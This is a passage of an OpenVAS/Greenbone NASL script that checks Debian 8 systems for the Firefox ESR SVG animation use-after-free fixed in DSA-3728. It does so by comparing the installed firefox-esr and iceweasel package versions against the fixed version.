script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n script_xref(name:\"URL\", value:\"http://www.debian.org/security/2016/dsa-3728.html\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2016 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB8\");\n script_tag(name:\"affected\", value:\"firefox-esr on Debian Linux\");\n script_tag(name:\"solution\", value:\"For the stable distribution (jessie),\nthis problem has been fixed in version 45.5.1esr-1~deb8u1.\n\nWe recommend that you upgrade your firefox-esr packages.\");\n script_tag(name:\"summary\", value:\"A use-after-free vulnerability in the\nSVG Animation was discovered in the Mozilla Firefox web browser, allowing a\nremote attacker to cause a denial of service (application crash) or execute\narbitrary code, if a user is tricked into opening a specially crafted website.\");\n script_tag(name:\"vuldetect\", value:\"This check tests the installed software\nversion using the apt package manager.\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif((res = isdpkgvuln(pkg:\"firefox-esr\", ver:\"45.5.1esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"firefox-esr-dbg\", ver:\"45.5.1esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"firefox-esr-dev\", ver:\"45.5.1esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"firefox-esr-l10n-ach\", ver:\"45.5.1esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"firefox-esr-l10n-af\", ver:\"45.5.1esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"firefox-esr-l10n-all\", ver:\"45.5.1esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"firefox-esr-l10n-an\", ver:\"45.5.1esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"firefox-esr-l10n-ar\", ver:\"45.5.1esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"firefox-esr-l10n-as\", ver:\"45.5.1esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"firefox-esr-l10n-ast\", ver:\"45.5.1esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"firefox-esr-l10n-az\", ver:\"45.5.1esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"firefox-esr-l10n-be\", ver:\"45.5.1esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"firefox-esr-l10n-bg\", ver:\"45.5.1esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"firefox-esr-l10n-bn-bd\", ver:\"45.5.1esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"firefox-esr-l10n-bn-in\", ver:\"45.5.1esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"firefox-esr-l10n-br\", ver:\"45.5.1esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"firefox-esr-l10n-bs\", ver:\"45.5.1esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"firefox-esr-l10n-ca\", ver:\"45.5.1esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"firefox-esr-l10n-cs\", ver:\"45.5.1esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"firefox-esr-l10n-cy\", ver:\"45.5.1esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"firefox-esr-l10n-da\", ver:\"45.5.1esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"firefox-esr-l10n-de\", ver:\"45.5.1esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"firefox-esr-l10n-dsb\", ver:\"45.5.1esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"firefox-esr-l10n-el\", ver:\"45.5.1esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"firefox-esr-l10n-en-gb\", ver:\"45.5.1esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"firefox-esr-l10n-en-za\", ver:\"45.5.1esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"firefox-esr-l10n-eo\", ver:\"45.5.1esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"firefox-esr-l10n-es-ar\", ver:\"45.5.1esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"firefox-esr-l10n-es-cl\", ver:\"45.5.1esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"firefox-esr-l10n-es-es\", ver:\"45.5.1esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"firefox-esr-l10n-es-mx\", ver:\"45.5.1esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"firefox-esr-l10n-et\", ver:\"45.5.1esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"firefox-esr-l10n-eu\", ver:\"45.5.1esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"firefox-esr-l10n-fa\", ver:\"45.5.1esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"firefox-esr-l10n-ff\", ver:\"45.5.1esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"firefox-esr-l10n-fi\", ver:\"45.5.1esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"firefox-esr-l10n-fr\", ver:\"45.5.1esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"firefox-esr-l10n-fy-nl\", ver:\"45.5.1esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"firefox-esr-l10n-ga-ie\", ver:\"45.5.1esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"firefox-esr-l10n-gd\", ver:\"45.5.1esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"firefox-esr-l10n-gl\", ver:\"45.5.1esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"firefox-esr-l10n-gn\", ver:\"45.5.1esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"firefox-esr-l10n-gu-in\", ver:\"45.5.1esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"firefox-esr-l10n-he\", ver:\"45.5.1esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"firefox-esr-l10n-hi-in\", ver:\"45.5.1esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"firefox-esr-l10n-hr\", ver:\"45.5.1esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"firefox-esr-l10n-hsb\", ver:\"45.5.1esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"firefox-esr-l10n-hu\", ver:\"45.5.1esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"firefox-esr-l10n-hy-am\", ver:\"45.5.1esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"firefox-esr-l10n-id\", ver:\"45.5.1esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"firefox-esr-l10n-is\", ver:\"45.5.1esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"firefox-esr-l10n-it\", ver:\"45.5.1esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"firefox-esr-l10n-ja\", ver:\"45.5.1esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"firefox-esr-l10n-kk\", ver:\"45.5.1esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"firefox-esr-l10n-km\", ver:\"45.5.1esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"firefox-esr-l10n-kn\", ver:\"45.5.1esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"firefox-esr-l10n-ko\", ver:\"45.5.1esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"firefox-esr-l10n-lij\", ver:\"45.5.1esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"firefox-esr-l10n-lt\", ver:\"45.5.1esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"firefox-esr-l10n-lv\", ver:\"45.5.1esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"firefox-esr-l10n-mai\", ver:\"45.5.1esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"firefox-esr-l10n-mk\", ver:\"45.5.1esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"firefox-esr-l10n-ml\", ver:\"45.5.1esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"firefox-esr-l10n-mr\", ver:\"45.5.1esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"firefox-esr-l10n-ms\", ver:\"45.5.1esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"firefox-esr-l10n-nb-no\", ver:\"45.5.1esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"firefox-esr-l10n-nl\", ver:\"45.5.1esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"firefox-esr-l10n-nn-no\", ver:\"45.5.1esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"firefox-esr-l10n-or\", ver:\"45.5.1esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"firefox-esr-l10n-pa-in\", ver:\"45.5.1esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"firefox-esr-l10n-pl\", ver:\"45.5.1esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"firefox-esr-l10n-pt-br\", ver:\"45.5.1esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"firefox-esr-l10n-pt-pt\", ver:\"45.5.1esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"firefox-esr-l10n-rm\", ver:\"45.5.1esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"firefox-esr-l10n-ro\", ver:\"45.5.1esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"firefox-esr-l10n-ru\", ver:\"45.5.1esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"firefox-esr-l10n-si\", ver:\"45.5.1esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"firefox-esr-l10n-sk\", ver:\"45.5.1esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"firefox-esr-l10n-sl\", ver:\"45.5.1esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"firefox-esr-l10n-son\", ver:\"45.5.1esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"firefox-esr-l10n-sq\", ver:\"45.5.1esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"firefox-esr-l10n-sr\", ver:\"45.5.1esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"firefox-esr-l10n-sv-se\", ver:\"45.5.1esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"firefox-esr-l10n-ta\", ver:\"45.5.1esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"firefox-esr-l10n-te\", ver:\"45.5.1esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"firefox-esr-l10n-th\", ver:\"45.5.1esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"firefox-esr-l10n-tr\", ver:\"45.5.1esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"firefox-esr-l10n-uk\", ver:\"45.5.1esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"firefox-esr-l10n-uz\", ver:\"45.5.1esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"firefox-esr-l10n-vi\", ver:\"45.5.1esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"firefox-esr-l10n-xh\", ver:\"45.5.1esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"firefox-esr-l10n-zh-cn\", ver:\"45.5.1esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"firefox-esr-l10n-zh-tw\", ver:\"45.5.1esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceweasel\", ver:\"45.5.1esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceweasel-dbg\", ver:\"45.5.1esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceweasel-dev\", ver:\"45.5.1esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceweasel-l10n-ach\", ver:\"45.5.1esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceweasel-l10n-af\", ver:\"45.5.1esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceweasel-l10n-all\", ver:\"45.5.1esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceweasel-l10n-an\", ver:\"45.5.1esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceweasel-l10n-ar\", ver:\"45.5.1esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceweasel-l10n-as\", ver:\"45.5.1esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceweasel-l10n-ast\", ver:\"45.5.1esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceweasel-l10n-az\", ver:\"45.5.1esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceweasel-l10n-be\", ver:\"45.5.1esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceweasel-l10n-bg\", ver:\"45.5.1esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceweasel-l10n-bn-bd\", ver:\"45.5.1esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceweasel-l10n-bn-in\", ver:\"45.5.1esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceweasel-l10n-br\", ver:\"45.5.1esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceweasel-l10n-bs\", ver:\"45.5.1esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceweasel-l10n-ca\", ver:\"45.5.1esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceweasel-l10n-cs\", ver:\"45.5.1esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceweasel-l10n-cy\", ver:\"45.5.1esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceweasel-l10n-da\", ver:\"45.5.1esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceweasel-l10n-de\", ver:\"45.5.1esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceweasel-l10n-dsb\", ver:\"45.5.1esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceweasel-l10n-el\", ver:\"45.5.1esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceweasel-l10n-en-gb\", ver:\"45.5.1esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceweasel-l10n-en-za\", ver:\"45.5.1esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceweasel-l10n-eo\", ver:\"45.5.1esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceweasel-l10n-es-ar\", ver:\"45.5.1esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceweasel-l10n-es-cl\", ver:\"45.5.1esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceweasel-l10n-es-es\", ver:\"45.5.1esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceweasel-l10n-es-mx\", ver:\"45.5.1esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceweasel-l10n-et\", ver:\"45.5.1esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceweasel-l10n-eu\", ver:\"45.5.1esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceweasel-l10n-fa\", ver:\"45.5.1esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceweasel-l10n-ff\", ver:\"45.5.1esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceweasel-l10n-fi\", ver:\"45.5.1esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceweasel-l10n-fr\", ver:\"45.5.1esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceweasel-l10n-fy-nl\", ver:\"45.5.1esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceweasel-l10n-ga-ie\", ver:\"45.5.1esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceweasel-l10n-gd\", ver:\"45.5.1esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceweasel-l10n-gl\", ver:\"45.5.1esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceweasel-l10n-gn\", ver:\"45.5.1esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceweasel-l10n-gu-in\", ver:\"45.5.1esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceweasel-l10n-he\", ver:\"45.5.1esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceweasel-l10n-hi-in\", ver:\"45.5.1esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceweasel-l10n-hr\", ver:\"45.5.1esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceweasel-l10n-hsb\", ver:\"45.5.1esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceweasel-l10n-hu\", ver:\"45.5.1esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceweasel-l10n-hy-am\", ver:\"45.5.1esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceweasel-l10n-id\", ver:\"45.5.1esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceweasel-l10n-is\", ver:\"45.5.1esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceweasel-l10n-it\", ver:\"45.5.1esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceweasel-l10n-ja\", ver:\"45.5.1esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceweasel-l10n-kk\", ver:\"45.5.1esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceweasel-l10n-km\", ver:\"45.5.1esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceweasel-l10n-kn\", ver:\"45.5.1esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceweasel-l10n-ko\", ver:\"45.5.1esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceweasel-l10n-lij\", ver:\"45.5.1esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceweasel-l10n-lt\", ver:\"45.5.1esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceweasel-l10n-lv\", ver:\"45.5.1esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceweasel-l10n-mai\", ver:\"45.5.1esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceweasel-l10n-mk\", ver:\"45.5.1esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceweasel-l10n-ml\", ver:\"45.5.1esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceweasel-l10n-mr\", ver:\"45.5.1esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceweasel-l10n-ms\", ver:\"45.5.1esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceweasel-l10n-nb-no\", ver:\"45.5.1esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceweasel-l10n-nl\", ver:\"45.5.1esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceweasel-l10n-nn-no\", ver:\"45.5.1esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceweasel-l10n-or\", ver:\"45.5.1esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceweasel-l10n-pa-in\", ver:\"45.5.1esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceweasel-l10n-pl\", ver:\"45.5.1esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceweasel-l10n-pt-br\", ver:\"45.5.1esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceweasel-l10n-pt-pt\", ver:\"45.5.1esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceweasel-l10n-rm\", ver:\"45.5.1esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceweasel-l10n-ro\", ver:\"45.5.1esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceweasel-l10n-ru\", ver:\"45.5.1esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = 